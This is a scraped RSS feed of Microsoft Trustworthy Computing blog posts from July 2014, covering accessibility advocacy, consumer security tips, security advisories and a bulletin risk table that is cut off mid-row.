Trustworthy Computing Security and Privacy Blogs./blogs/default.aspxThis page consolidates and features blogs from Microsoft’s Trustworthy Computing (TwC) group, The team charged with working to deliver more secure, private and reliable computing experiences to customers and the globe. Drop by to read about Microsoft’s long-term vision and strategy, for computing privacy and security.On the ADA’s Anniversary Work Remains to Make Workplaces Accessiblehttp://blogs.msdn.com/b/accessibility/archive/2014/07/25/on-the-ada-s-anniversary-work-remains-to-make-workplaces-accessible.aspxFri, 25 Jul 2014 14:31:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10545062Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10545062http://blogs.msdn.com/b/accessibility/archive/2014/07/25/on-the-ada-s-anniversary-work-remains-to-make-workplaces-accessible.aspx#comments<p>Twenty-four years ago, the Americans with Disabilities Act (ADA) promised a new generation of workers opportunities to join the U.S. workforce. But as we celebrate the anniversary of the act Saturday, a <a href="http://www.help.senate.gov/newsroom/press/release/?id=8c890e1c-27fd-4599-b040-0e2631a96212">report</a>offers a sobering reminder that many members of this ADA generation still face high barriers when looking for a job.</p> <p>Today, more than two-thirds of Americans with disabilities are not in the workforce and employment of workers with disabilities hasn&rsquo;t improved since the act was passed in 1990, according to the <a href="http://www.help.senate.gov/newsroom/press/release/?id=8c890e1c-27fd-4599-b040-0e2631a96212">congressional report released last year</a> by Sen. Tom Harkin, D-Iowa. The report proposed a bold plan to help the ADA generation make easier transitions from school to work.</p>...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/25/on-the-ada-s-anniversary-work-remains-to-make-workplaces-accessible.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10545062" width="1" height="1"> What you need to know about privacy and security in OneDrivehttp://blogs.msdn.com/b/securitytipstalk/archive/2014/07/24/what-you-need-to-know-about-privacy-and-security-in-onedrive.aspxThu, 24 Jul 2014 15:24:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10543978Eve Blakemore0http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10543978http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/24/what-you-need-to-know-about-privacy-and-security-in-onedrive.aspx#comments<p><a href="https://onedrive.live.com/about/en-in/">OneDrive</a>&nbsp;is free online storage that's built into&nbsp;Windows&nbsp;8.1&nbsp;and&nbsp;Windows&nbsp;RT&nbsp;8.1. Add files from your PC to OneDrive,&nbsp;and then easily access your photos, music, documents, and other files on all the devices you use.</p> <h1>How you can help protect your privacy and security in OneDrive</h1> <p class="para"><strong>Create a strong password for your Microsoft Account.&nbsp;</strong>You sign into OneDrive with your <a href="http://www.microsoft.com/security/online-privacy/microsoft-account.aspx">Microsoft Account</a>. Here is some basic guidance on how to create a strong password for that account. Different sites have different rules for passwords that they&rsquo;ll accept, but this guidance should work anywhere you need to create a password:</p> <ul> <li><strong>Length.</strong> Make your passwords at least eight (8) characters long.</li> <li><strong>Complexity.</strong> Include a combination of at least three (3) uppercase and/or lowercase letters, punctuation, symbols, and numerals. The more variety of characters in your password, the better.</li> <li><strong>Variety.</strong> Don't use the same password for everything. Cybercriminals can steal passwords from websites that have poor security and then use those same passwords to target more secure environments, such as banking websites. <a href="http://go.microsoft.com/fwlink/p/?LinkID=248678">Check the strength of your password</a>.</li> </ul> <p class="para"><strong>Manage who can view or edit your OneDrive files. </strong>By default, your OneDrive files are available to you, although you can choose to share photos, documents, and other files. To share files or folders, right-click them and choose how you want to share them.</p> <p class="para"><strong>Add security info to your Microsoft account.</strong> You can add information like your phone number, an alternate email address, and a security question and answer to your account. That way, if you ever forget your password or your account gets hacked, we can use your security info to verify your identity and help you get back into your account. Go to the&nbsp;<a href="http://go.microsoft.com/fwlink/p/?LinkID=263780">Security info page</a>.</p> <p class="para"><strong>Use two-step verification.</strong> This helps protect your account by requiring you to enter an extra security code whenever you sign in on a device that isn&rsquo;t trusted. For more information about two-step verification, see&nbsp;<a href="http://windows.microsoft.com/en-us/windows/two-step-verification-faq">Two-step verification: FAQ</a>.</p> <p class="para"><strong>Back up your&nbsp;OneDrive&nbsp;files.</strong> For details about using File History in Windows, see&nbsp;<a href="http://windows.microsoft.com/en-us/windows-8/set-drive-file-history">Set up a drive for File History</a>.</p> <p class="para">For more information about how Microsoft helps keep your files safe in the cloud, see <a href="http://www.microsoft.com/security/online-privacy/onedrive.aspx">Privacy in OneDrive</a>.</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10543978" width="1" height="1">privacysecurityMicrosoftcloud securityOneDrive IBM Names Frances West as Chief Accessibility Officerhttp://blogs.msdn.com/b/accessibility/archive/2014/07/23/ibm-names-frances-west-as-chief-accessibility-officer.aspxWed, 23 Jul 2014 18:30:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10544676Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10544676http://blogs.msdn.com/b/accessibility/archive/2014/07/23/ibm-names-frances-west-as-chief-accessibility-officer.aspx#comments<p>For more than 20 years, Microsoft and IBM have worked side-by-side on digital inclusion efforts and the development of technology for people with disabilities. So, I am excited to congratulate my longtime colleague, Frances West, who was recently named IBM&rsquo;s first Chief Accessibility Officer (CAO). I have known Frances for years as the Director of the IBM Research Human Ability and Accessibility Center where she has served to advance accessible solutions produced by IBM and worked with myself and others as an advocate for effective accessibility policies around the world.</p>...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/23/ibm-names-frances-west-as-chief-accessibility-officer.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10544676" width="1" height="1">IAAPIBMCAO Is Windows Security Center real or rogue?http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/22/is-windows-security-center-real-or-rogue.aspxTue, 22 Jul 2014 15:31:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10543260Eve Blakemore5http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10543260http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/22/is-windows-security-center-real-or-rogue.aspx#comments<p>A reader writes:</p> <p><em>What kind of warnings from Windows Security Center are real, and what should I do about them?</em></p> <p><a href="http://windows.microsoft.com/en-us/windows-vista/using-windows-security-center">Windows Security Center</a> is a feature that was introduced in Windows XP Service Pack 2 and was also included in Windows Vista. (<a href="http://windows.microsoft.com/en-us/windows7/what-is-action-center">Action Center</a> replaced Windows Security Center in Windows 7.)</p> <p>Security Center checks the security status on your computer, including:</p> <ul> <li> <p>Firewall settings</p> </li> <li> <p>Windows automatic updating</p> </li> <li> <p>Antivirus software settings</p> </li> <li> <p>Internet security settings</p> </li> <li> <p>User Account Control settings</p> </li> </ul> <p>If Security Center detects a security problem, it displays a notification and puts a Security Center icon&nbsp;&nbsp;in the notification area.&nbsp;Click the notification or double-click the Security Center icon <a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-72-21/5584.security-center-icon.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/10x10/__key/communityserver-blogs-components-weblogfiles/00-00-00-72-21/5584.security-center-icon.png" alt="Security Center Icon" width="10" height="13" /></a>&nbsp;to open Security Center and get information about how to fix the problem.</p> <h1>Is Windows Security Center a virus?</h1> <p>In the years since Security Center was introduced, cybercriminals have created several different kinds of malware that look like Security Center or have the same name. If you have this malware on your computer, it might lure you into a fraudulent transaction, steal your personal information, or slow down your computer.&nbsp;This kind of malware is called &ldquo;rogue security software.&rdquo; <a href="http://www.microsoft.com/security/pc-security/antivirus-rogue.aspx">Learn how to spot and avoid these fake virus alerts</a>.</p> <h1>How do I know if the warnings are real?</h1> <ol> <li>If you think a warning looks suspicious, the first thing you can do is run antivirus software on your computer, which might let you know if you have a virus. Learn more <a href="http://www.microsoft.com/security/pc-security/protect-os.aspx">about antivirus software for your operating system</a>.</li> <li>To check your knowledge of real security warnings and fake security warnings, and to learn how to help protect your computer and personal information, <a href="https://www.facebook.com/msftmmpc/app_236330836495399">take our quiz</a>.</li> </ol><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10543260" width="1" height="1">virusmalwarerogue security softwareautomatic updatingAutomatic Updatesfirewalluser account control 9 ways to stay safe online this summerhttp://blogs.msdn.com/b/securitytipstalk/archive/2014/07/17/9-ways-to-stay-safe-online-this-summer.aspxThu, 17 Jul 2014 16:30:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10543258Eve Blakemore1http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10543258http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/17/9-ways-to-stay-safe-online-this-summer.aspx#comments<p>Summer is in full swing. Here are our best safety and security tips for the season.</p> <ol> <li> <p><strong>Don&rsquo;t broadcast vacation plans on your social networking sites.</strong>&nbsp;If you&rsquo;re leaving your home unoccupied and at risk for potential burglary, you might want to wait to post your vacation photographs until you return home. <a href="http://www.microsoft.com/security/online-privacy/email.aspx">Get more tips for email and social networking safety</a>.</p> </li> <li> <p><strong>Limit who knows your location.</strong> Before you go on vacation, take a few minutes to adjust settings for sharing your location on your social networking sites and any apps on your smartphone. If you have kids who go online, make sure they know this, too. For more information, see&nbsp;<a href="http://www.microsoft.com/security/online-privacy/location-services.aspx">Use location services more safely</a>.</p> </li> <li> <p><strong>Set computer and device rules for when you&rsquo;re not around. </strong>If your kids are old enough to stay home alone when they&rsquo;re not at school, make sure you talk to them about Internet safety. <a href="http://go.microsoft.com/?linkid=9838905">Download our tip sheet for pointers to jump-start&mdash;or continue&mdash;online safety conversations</a>.</p> </li> <li> <p><strong>Learn how to use parental controls.</strong> All Microsoft products include built-in privacy controls and safeguards that put you in charge of your children&rsquo;s entertainment experiences and allow you to customize how personal information is, or is not, shared. <a href="http://www.microsoft.com/en-gb/about/family-safety/safer-families">Get step-by-step guidance on how to switch on safety settings across Microsoft technology and devices at home</a>.</p> </li> <li> <p><strong>Stay safe when playing games online.</strong> If your children&rsquo;s summer sport of choice is <a href="http://www.microsoft.com/security/online-privacy/xbox.aspx">the Xbox, Xbox One, Kinect</a>, or other online or console game, learn about <a href="http://support.xbox.com/en-US/xbox-one/security/core-family-safety-features">the core family safety features of Xbox One</a> and <a href="http://www.microsoft.com/security/family-safety/gaming-about.aspx">find other ways to help kids play it safe</a>.</p> </li> <li> <p><strong>Update your software on your laptop or tablet.</strong> Before you go on vacation, make sure all your software is updated, to help prevent problems caused by hackers. If your laptop is still running Windows XP, read about the <a href="http://windows.microsoft.com/en-us/windows/end-support-help">end of support for Windows XP</a>.</p> </li> <li> <p><strong>Check the security level of public Wi-Fi networks before you use them.</strong> Choose the most secure connection&mdash;even if that means you have to pay for access. A password-protected connection (ideally one that is unique for your use) is better than one without a password. Both&nbsp;<a href="http://windows.microsoft.com/en-US/windows7/How-do-I-know-if-a-wireless-network-is-secure">Windows 7</a>&nbsp;and&nbsp;<a href="http://windows.microsoft.com/en-US/windows-8/how-know-network-safe-to-connect">Windows 8</a>&nbsp;can help you evaluate and minimize network security risks.</p> </li> <li> <p><strong>Avoid typing sensitive information on your laptop using an unsecured wireless connection.</strong> If possible, save your financial transactions for after your summer vacation on a secured home connection. For more information, see <a href="http://windows.microsoft.com/en-us/windows/know-online-transaction-secure#1TC=windows-7">How to know if a financial transaction is secure.</a></p> </li> <li> <p><strong>Watch out for suspicious messages from your friends on vacation asking for money. </strong>This is a common scam cybercriminals use when they&rsquo;ve hacked into someone&rsquo;s account. Find a different way to contact your friend. <a href="http://www.microsoft.com/security/online-privacy/phishing-scams.aspx">Learn more about scam email messages</a>.</p> </li> </ol><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10543258" width="1" height="1">fraudid theftspamchild safetymalwarefamilymonthly security updatesautomatic updatingsecurityMicrosoft Updateonline safetycybersecuritycybersafetyantispywareMicrosoftgeolocationWindows 8location services Access Israel Is Working Towards True Integration of All People with Disabilitieshttp://blogs.msdn.com/b/accessibility/archive/2014/07/17/access-israel-is-working-towards-true-integration-of-all-people-with-disabilities.aspxThu, 17 Jul 2014 08:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10543062Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10543062http://blogs.msdn.com/b/accessibility/archive/2014/07/17/access-israel-is-working-towards-true-integration-of-all-people-with-disabilities.aspx#comments<p>One of the best parts of my job is that I get to collaborate with inspiring organizations around the world that are working to create a more accessible and inclusive society. Last month, I was at the second annual conference of <a href="http://www.aisrael.org/?CategoryID=2110&amp;ArticleID=44873">Access Israel</a>, a non-profit group working to improve quality of life for people with disabilities. Over two days, I learned about the incredible range of accessibility work happening across that country.</p>...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/17/access-israel-is-working-towards-true-integration-of-all-people-with-disabilities.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10543062" width="1" height="1"> New Story Features Microsoft Project that Uses Your Skin as a Keypadhttp://blogs.msdn.com/b/accessibility/archive/2014/07/15/new-story-features-microsoft-project-that-uses-your-skin-as-a-keypad.aspxTue, 15 Jul 2014 18:40:06 GMT91d46819-8472-40ad-a661-2c78acb4018c:10542606Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10542606http://blogs.msdn.com/b/accessibility/archive/2014/07/15/new-story-features-microsoft-project-that-uses-your-skin-as-a-keypad.aspx#commentsScientists and doctors are merging technology and the human body in breakthroughs that help people with a wide range of abilities, including a project by Microsoft researchers that is developing keypads for your skin, the Las Vegas Sun reports . Today...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/15/new-story-features-microsoft-project-that-uses-your-skin-as-a-keypad.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10542606" width="1" height="1"> Dynamics CRM Online for Governments Compliant with FedRAMPhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/07/15/dynamics-crm-online-for-governments-compliant-with-fedramp.aspxTue, 15 Jul 2014 17:47:45 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:da57ba2d-8b40-40ff-a19c-f768ef0b9decTrusted Cloud Team0<p style="margin:0in 0in 0pt;"><strong><span lang="EN" style="color:#333333;font-family:&#39;Segoe UI&#39;,&#39;sans-serif&#39;;font-size:10.5pt;">By Adrienne Hall, General Manager, Trustworthy Computing</span></strong></p> <p>Yesterday at Microsoft&#39;s worldwide partner conference, my colleague Curt Kolcun, Vice President, U.S. Public Sector announced additional updates that make Microsoft&rsquo;s cloud &ndash; which spans infrastructure, data, productivity, mobility and more &ndash;an increasingly compelling solution for government customers.&nbsp;</p> <p>Curt announced several things.&nbsp;The first is that Dynamics CRM Online joins Office 365 and Azure in providing additional cloud services for government, in compliance with FedRAMP.&nbsp;Available in early 2015, this will allow customers to use their existing Microsoft investments on-premises and in the cloud through hybrid capabilities including integration with Azure and Office 365 government community clouds.&nbsp;<span style="color:#0066dd;"><a href="/b/trustworthycomputing/archive/2014/07/15/dynamics-crm-online-for-governments-compliant-with-fedramp.aspx">Read more &gt;&gt;</a></span></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/07/15/dynamics-crm-online-for-governments-compliant-with-fedramp.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3634616&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">Dynamics CRM OnlineAzureOffice 365FedRAMPCloud Computing Microsoft takes on world’s worst cybercriminalshttp://blogs.msdn.com/b/securitytipstalk/archive/2014/07/15/microsoft-takes-on-world-s-worst-cybercriminals.aspxTue, 15 Jul 2014 15:49:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10542267Eve Blakemore4http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10542267http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/15/microsoft-takes-on-world-s-worst-cybercriminals.aspx#comments<p>Microsoft recently took legal action against a group of cybercriminals suspected of spreading malicious software to millions of unsuspecting computer users.</p> <p>These social media&ndash;savvy cybercriminals have not only spread the <a href="http://www.microsoft.com/security/resources/malware-whatis.aspx">malware</a> themselves, but they&rsquo;ve also promoted their malicious tools across the Internet, offering step-by-step instructions to completely control millions of unsuspecting victims&rsquo; computers to conduct illicit crimes.</p> <p>For more information on the legal action, see <a href="http://blogs.microsoft.com/blog/2014/06/30/microsoft-takes-on-global-cybercrime-epidemic-in-tenth-malware-disruption/">Microsoft takes on global cybercrime epidemic in tenth malware disruption</a>.</p> <h1>To help protect yourself against cybercrime</h1> <ul> <li>Keep your operating system and other software updated.</li> <li>Use antivirus software (and keep it updated).</li> <li>Don&rsquo;t open suspicious email messages, links, or attachments.</li> </ul> <p>Get more guidance at <a href="http://www.microsoft.com/security/pc-security/protect-pc.aspx">How to boost your malware defense and protect your PC</a>.</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10542267" width="1" height="1">botnetmonthly security updatesautomatic updatingAutomatic UpdatesMicrosoft Updateantivirus softwarecybersecuritycybersafetycybercriminalsmalicious softwareMicrosoft WindowsDigital Crimes UnitMicrosoft July 2014 Security Bulletin Webcast and Q&Ahttp://blogs.technet.com/b/msrc/archive/2014/07/14/july-2014-security-bulletin-webcast-and-q-amp-a.aspxMon, 14 Jul 2014 20:30:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:365fbc49-0788-4ddc-a5dd-eb87b7b15fe0Dustin C. Childs0<p>Today we published the July 2014 Security Bulletin webcast <a href="http://blogs.technet.com/b/msrc/p/july2-2014-security-bulletin-q-a.aspx">questions and answers page</a> along with the webcast replay. We answered eight questions on air, with the majority focusing on the update for <a href="https://technet.microsoft.com/library/security/ms14-037">Internet Explorer</a>. The transcript also includes a question we did not have time to answer on the air.</p> <p>Here is the video replay:</p> <p><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/hbniTR475GE?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed src="http://www.youtube.com/v/hbniTR475GE?version=3&amp;hl=en_US" type="application/x-shockwave-flash" width="500" height="281" /></object></p> <p>We invite you to join us for the next scheduled webcast on Wednesday, August 13, 2014, at 11 a.m. PDT (UTC -7), when we will go into detail about the August bulletin release and answer your bulletin deployment questions live on the air. There&rsquo;s no longer a need to register before this event to attend. You can find details on how to view the webcast and get a calendar reminder <a href="http://technet.microsoft.com/en-us/security/dn756352">here</a>.</p> <p>I look forward to seeing you next month.</p> <p>Thanks,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3634575&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsBulletin WebcastCustomer QuestionsInternet Explorer (IE) #TBT : Be Safer–Run as Standard Userhttp://blogs.technet.com/b/security/archive/2014/07/10/tbt-be-safer-run-as-standard-user.aspxThu, 10 Jul 2014 21:15:12 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:f26d0a36-0604-4c94-ab32-44a0676a39a3Jeff Jones - MSFT0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3634407http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3634407http://blogs.technet.com/b/security/archive/2014/07/10/tbt-be-safer-run-as-standard-user.aspx#commentsFor #ThrowBackThursday, I thought it would be good to pull out an old but goodie. The original post is from back before the blog evolved into the Microsoft Security Blog and was still called &ldquo;Jeff Jones Security Blog&rdquo;. I&rsquo;m including...(<a href="http://blogs.technet.com/b/security/archive/2014/07/10/tbt-be-safer-run-as-standard-user.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3634407&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">WindowsTipsSecurityPersonal Technology Trouble installing updates? Might be a case of bad timinghttp://blogs.msdn.com/b/securitytipstalk/archive/2014/07/10/trouble-installing-updates-might-be-a-case-of-bad-timing.aspxThu, 10 Jul 2014 16:10:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10540612Eve Blakemore4http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10540612http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/10/trouble-installing-updates-might-be-a-case-of-bad-timing.aspx#comments<p>This week we released security updates for the Windows operating system. If you have automatic updating turned on, your updates have probably already been downloaded and installed for you.</p> <p><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Learn how to get updates automatically</a></p> <p>Even if you have automatic updating turned on, you might see an error message telling you that your updates were not installed.</p> <p>Some errors are simply a matter of bad timing. Sometimes your updates don&rsquo;t install because the website is too busy or you&rsquo;re using a slow connection. You can usually fix these problems by trying to install the updates again.</p> <p>For more information about solving connection problems, see:</p> <ul> <li><a href="http://windows.microsoft.com/en-us/windows-8/how-solve-connection-problems-windows-update">How to solve connection problems with Windows Update</a></li> <li><a href="http://windows.microsoft.com/en-us/windows/troubleshoot-problems-installing-updates#1TC=windows-8">Troubleshoot problems with installing updates</a></li> </ul><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10540612" width="1" height="1">updatesmonthly security updatesautomatic updatingAutomatic UpdatessecurityMicrosoft Updateonline safetypatch TuesdaycybersafetyMicrosoft WindowsMicrosofttroubleshooting updates Security Advisory 2982792 released, Certificate Trust List updatedhttp://blogs.technet.com/b/msrc/archive/2014/07/10/security-advisory-2982792-released-certificate-trust-list-updated.aspxThu, 10 Jul 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:dfcdfb5e-f2a7-4f6b-acfc-f4397ccbe72cDustin C. Childs0<p>Today, we are updating the Certificate Trust List (CTL) for all supported releases of Microsoft Windows to remove the trust of mis-issued third-party digital certificates. These certificates could be used to spoof content and perform phishing or man-in-the-middle attacks against web properties.</p> <p>With this update, most customers will be automatically protected against this issue and will not need to take any action. If you do not have automatic updates enabled, or if you are on Windows Server 2003, please see the <a href="https://technet.microsoft.com/en-us/library/security/2982792.aspx">Security Advisory 2982792</a> for recommended actions. Additionally, the <a href="http://www.microsoft.com/emet">Enhanced Mitigation Experience Toolkit (EMET) 4.1</a>, and newer versions, help to mitigate man-in-the-middle attacks by detecting untrusted or improperly issued SSL certificates through the Certificate Trust feature.</p> <p>For more information, please see <a href="https://technet.microsoft.com/en-us/library/security/2982792.aspx">Microsoft Security Advisory 2982792</a>.</p> <p>Thank you,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3634363&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">AdvisorySecurity Advisory Diversity and Collaboration Will Drive IAAP’s Successhttp://blogs.msdn.com/b/accessibility/archive/2014/07/10/diversity-and-collaboration-will-drive-iaap-s-success.aspxThu, 10 Jul 2014 15:29:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10541093Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10541093http://blogs.msdn.com/b/accessibility/archive/2014/07/10/diversity-and-collaboration-will-drive-iaap-s-success.aspx#commentsThis blog post was written by Rob Sinclair, Microsoft&rsquo;s Chief Accessibility Officer. Rob is responsible for the company's worldwide strategy to develop software and services that make it easier for people of all ages and abilities to see, hear,...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/10/diversity-and-collaboration-will-drive-iaap-s-success.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10541093" width="1" height="1"> The Initial Impact of Federal Rules to Encourage Employment of People with Disabilitieshttp://blogs.msdn.com/b/accessibility/archive/2014/07/09/the-initial-impact-of-federal-rules-to-encourage-employment-of-people-with-disabilities.aspxWed, 09 Jul 2014 22:39:56 GMT91d46819-8472-40ad-a661-2c78acb4018c:10541089Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10541089http://blogs.msdn.com/b/accessibility/archive/2014/07/09/the-initial-impact-of-federal-rules-to-encourage-employment-of-people-with-disabilities.aspx#commentsThe federal government implemented new rules this spring that encourage the hiring of people with disabilities. A story in the Pittsburgh Post-Gazette explores the early impact of these new rules, which set a goal for both federal contractors and subcontractors...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/09/the-initial-impact-of-federal-rules-to-encourage-employment-of-people-with-disabilities.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10541089" width="1" height="1"> Security, Transparency and Privacyhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/07/08/security-transparency-and-privacy.aspxTue, 08 Jul 2014 19:03:51 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:cfcdecf6-b71a-474d-94cc-7772ad2b6414Trusted Cloud Team0<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong><br /><br />Last week my colleague, Matt Thomlinson, shared some <a target="_blank" href="/b/microsoft_on_the_issues/archive/2014/07/01/advancing-our-encryption-and-transparency-efforts.aspx">important updates</a> about Microsoft&rsquo;s efforts to enhance protections for our customers&rsquo; data and to increase transparency regarding our engagements with governments around the world.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/07/08/security-transparency-and-privacy.aspx">Read more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/07/08/security-transparency-and-privacy.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3634283&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">CustomersBrendon LynchBig DataTrustworthy ComputingMicrosoftDataPrivacy New Strategies and Features to Help Organizations Better Protect Against Pass-the-Hash Attacks http://blogs.technet.com/b/security/archive/2014/07/08/new-strategies-and-features-to-help-organizations-better-protect-against-pass-the-hash-attacks.aspxTue, 08 Jul 2014 17:09:20 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:94bd342a-50b1-4deb-ae4c-cf80d5258abfMicrosoft Security Staff0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3634186http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3634186http://blogs.technet.com/b/security/archive/2014/07/08/new-strategies-and-features-to-help-organizations-better-protect-against-pass-the-hash-attacks.aspx#comments<p>Posted by <strong>Matt Thomlinson</strong>, Vice President, Microsoft Security</p> <p>Today, we released new guidance to&nbsp;help our&nbsp;customers address credential theft, called <a href="http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating-Pass-the-Hash-Attacks-and-Other-Credential-Theft-Version-2.pdf">Mitigating Pass-the-Hash and Other Credential Theft, version 2</a>. The paper encourages IT professionals to &ldquo;assume breach&rdquo; to highlight the need for the use of holistic planning strategies and features in Microsoft Windows to become more resilient against credential theft attacks. This paper builds on our <a href="/b/security/archive/2012/12/06/new-guidance-to-mitigate-determined-adversaries-favorite-attack-pass-the-hash.aspx">previously released </a>guidance and mitigations for Pass-the-Hash (PtH) attacks.&nbsp;</p> <p>Given that organizations must continue to operate after a breach, it is critical for them to have a plan to minimize the impact of successful attacks on their ongoing operations. Adopting an approach that assumes a breach will occur, ensures that organizations have a holistic plan in place before an attack occurs. A planned approach enables defenders to close the seams that attackers are aiming to exploit.</p> <p>The guidance also underscores another important point - that technical features alone may not prevent lateral movement and privilege escalation. In order to substantially reduce credential theft attacks, organizations should consider the attacker mindset and use strategies such as identifying key assets, implementing detection mechanisms, and having a breach recovery plan. These strategies can be implemented in combination with Windows features to provide a more effective defensive approach, and are aligned to the well-known <a href="http://www.nist.gov/cyberframework/index.cfm">National Institute of Standards and Technology (NIST) Cybersecurity Framework.&nbsp;</a> <a href="/b/security/archive/2014/07/08/new-strategies-and-features-to-help-organizations-better-protect-against-pass-the-hash-attacks.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/07/08/new-strategies-and-features-to-help-organizations-better-protect-against-pass-the-hash-attacks.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3634186&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">PTHGuidanceversion 2Pass-the-Hash and other credential theft Assessing risk for the July 2014 security updates http://blogs.technet.com/b/srd/archive/2014/07/08/assessing-risk-for-the-july-2014-security-updates.aspxTue, 08 Jul 2014 17:03:17 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:5ef2aafc-cdc2-4bd7-aa3a-fa37669345bbSRD Blog Author0<p>Today we released six security bulletins addressing 29 unique CVE&rsquo;s. Two bulletins have a maximum severity rating of Critical, three have maximum severity Important, and one is Moderate. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</p> <table border="1"> <tbody> <tr> <td><b>Bulletin</b></td> <td><b>Most likely attack vector</b></td> <td><b>Max Bulletin Severity</b></td> <td><b>Max exploit-ability</b></td> <td><b>Likely first 30 days impact</b></td> <td><b>Platform mitigations and key notes</b></td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-037">MS14-037</a> <p>(Internet Explorer)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Addresses 23 remote code execution issues and one lower severity Security Feature Bypass vulnerability.</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-038">MS14-038</a> <p>(Windows Journal)</p> </td> <td>Victim opens malicious .JNT file or navigates with Explorer to a WebDAV share under attacker control where a malicious .JNT file is automatically 